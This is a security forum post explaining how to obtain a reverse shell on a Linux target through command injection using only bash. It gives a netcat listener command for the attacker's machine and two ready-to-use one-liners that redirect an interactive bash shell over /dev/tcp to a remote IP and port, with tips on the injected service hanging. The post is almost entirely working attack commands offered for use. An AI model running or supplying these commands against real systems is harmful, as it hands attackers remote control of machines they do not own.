Announcement

Collapse
No announcement yet.

BASH - Creating a Reverse shell on Linux using BASH

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • BASH - Creating a Reverse shell on Linux using BASH

    In some cases you will need a reverse shell but the target may not have any handy tools installed to accomplish this or maybe you don't yet know what possibilities the target host has to offer. If you already have some kind of a shell, this is obviously not interesting but this comes in handy if you are able to do some kind of command injection and is looking for an easier way to quickly get a shell.

    First you will need a listener on the attacker box to receive the reverse shell and this can be done with one of the many tools such as nc (netcat), ncat, sbd and many others.
    Here we set up a listener om the attacker host using netcat to listen on port 4444..
    Code:
    # nc -nvlp 4444
    On the target host you will need to inject the following command to start a new interactive bash shell with direction over the local network.
    Code:
    # /bin/bash -i > /dev/tcp/10.10.10.10/4444 0<&1 2>&1
    This command will send the shell to the IP address 10.10.10.10 on port 4444 that we picked as the listening port. Change the destination IP address and port number to match your setup.

    An alternative way of accomplishing the same thing could be to execute below command. This will also send you a reverse bash shell.
    Code:
    # bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
    This will send the newly spawned bash to the listening netcat session on the attacker box. It is very simple and highly effective because it does not require the attacker to install any additional packages. One thing to note is that the application or service that you are doing your command injection to will hang as long as you keep the shell open. You can close the shell on the attacker box with the "exit" command and that will in turn free the service or application was injected to.
    Last edited by Resheph; 06-02-2018, 01:31 PM. Reason: Added alternative way of spawning a bash shell
    Certified Security Geek
Working...
X